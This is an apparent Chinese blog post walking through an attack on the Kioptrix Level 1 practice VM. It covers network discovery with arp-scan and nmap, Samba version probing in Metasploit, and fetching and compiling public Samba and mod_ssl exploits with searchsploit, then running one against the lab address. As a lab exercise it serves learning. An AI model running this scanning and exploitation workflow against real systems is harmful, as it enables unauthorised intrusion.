攻破 Kioptix Level 1 靶机

找教程然后自己练习,论菜狗的自我修养

基本步骤

1.确定目标IP

2.扫描端口,服务,版本信息,漏洞信息

3.查找漏洞可利用脚本

4.运行脚步

一、信息获取

arp-scan -l

nmap -sS -p- -sV -sC -A --min-rate=5000 192.168.5.130

二、查找可利用漏洞并攻击

思路a.  139端口Samba服务

由于 -sV 未探测到其版本,用 msf 的模块进行探测

msfcomsole

use auxiliary/scanner/smb/smb_version

show options

set RHOSTS 192.168.5.130

run

查找、利用漏洞

searchsploit Samba 2.2

searchsploit -m multiple/remote/10.c

gcc 10.c -o k1exp

head 10.c -n 50

./k1exp -b 0 -v 192.168.5.130        

思路b. 80端口 apache mode_ssl

searchsploit mod_ssl

searchsploit -m unix/remote/47080.c

head 47080.c -n 50

apt-get install libssl-dev

gcc 47080.c -o k11exp -lcrypto

选择一个找到的漏洞叫版本并查看使用fang

libssl-dev 可下载

libssl1.0-dev 下载不了

编译出错

可能kali版本太老了。

补充说明

arp-scan -l

arp-scan 是一个用于发送 ARP 请求以发现和映射本地网络中的设备的工具.

-l--localnet:这个选项会让 arp-scan 扫描本地网络(即与执行命令的主机在同一子网中的设备)

最后会列出本地网络中发现的所有设备,包括它们的 MAC 地址、IP 地址和厂商信息。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值